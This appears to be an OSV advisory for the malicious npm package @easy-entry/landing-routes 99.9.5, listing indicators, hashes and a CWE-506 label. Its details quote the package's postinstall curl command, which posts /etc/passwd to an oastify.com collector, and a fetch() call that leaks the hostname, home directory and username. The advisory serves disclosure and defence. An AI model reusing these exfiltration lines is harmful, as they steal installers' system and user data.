MAL-2026-5408

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@easy-entry/landing-routes/MAL-2026-5408.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5408

Published

2026-06-09T17:18:44Z

Modified

2026-06-09T18:01:29.861165057Z

Summary

Malicious code in @easy-entry/landing-routes (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (16fd1aa3384490a5c01cbdc619bb61ea5fc70f853c8e8ed2e9836d2ca4617556)

On npm install, the package's postinstall hook runs two exfiltration paths against an attacker-controlled Burp Collaborator endpoint. First, package.json line 4 invokes /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the installer's /etc/passwd to a DNS-logging subdomain that encodes the victim's hostname. Second, scripts/scream3gg.js reads os.hostname(), os.homedir(), and os.userInfo().username, hex-encodes them, and issues fetch('http://' + safeData + '.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com'), leaking host identifiers via DNS+HTTP. Both paths fire automatically on default install with no opt-in.

Database specific

{
    "malicious-packages-origins": [
        {
            "import_time": "2026-06-09T17:45:49.398759157Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "16fd1aa3384490a5c01cbdc619bb61ea5fc70f853c8e8ed2e9836d2ca4617556",
            "id": "IN-MAL-2026-005019",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T17:18:44Z"
        },
        {
            "modified_time": "2026-06-09T17:18:44Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "1cba0345cf355b11407a4df4920609c18b072e0c993445f86484813768961369",
            "id": "IN-MAL-2026-005020",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.451544597Z"
        }
    ]
}

References

https://www.npmjs.com/package/@easy-entry/landing-routes/v/99.9.5

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / @easy-entry/landing-routes

Package

Name: @easy-entry/landing-routes; View open source insights on deps.dev
Purl: pkg:npm/%40easy-entry%2Flanding-routes

Affected ranges

Affected versions

99.*

99.9.5

Database specific

indicators

{
    "domains": [
        "2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "7363616e2d666535376161356263396562.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"
    ],
    "evidence_files": [
        {
            "sha256": "9c65010f1c2d82de2f1d092a61670248ed69db99b174512daabbe6f86cf964d3",
            "tlsh": "58d0a7b07810c7b379cd06778118a1557d65c95b120479a645df87e5912436278e6906",
            "path": "package.json"
        },
        {
            "sha256": "9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9",
            "tlsh": "74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde",
            "path": "scripts/scream3gg.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-6KdmTOrXanUVAlLuqEl/7PdHvIOT+wLTbDTNHzW/dLZVbASOaXvCGswMqp6d9dLhOzhOqQxB5ok28qc8LppO6w==",
                "sha1": "8d7f5fc40b957af790bb0c4b6461e6a783fbb19a"
            },
            "filename": "landing-routes-99.9.5.tgz"
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@easy-entry/landing-routes/MAL-2026-5408.json"

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]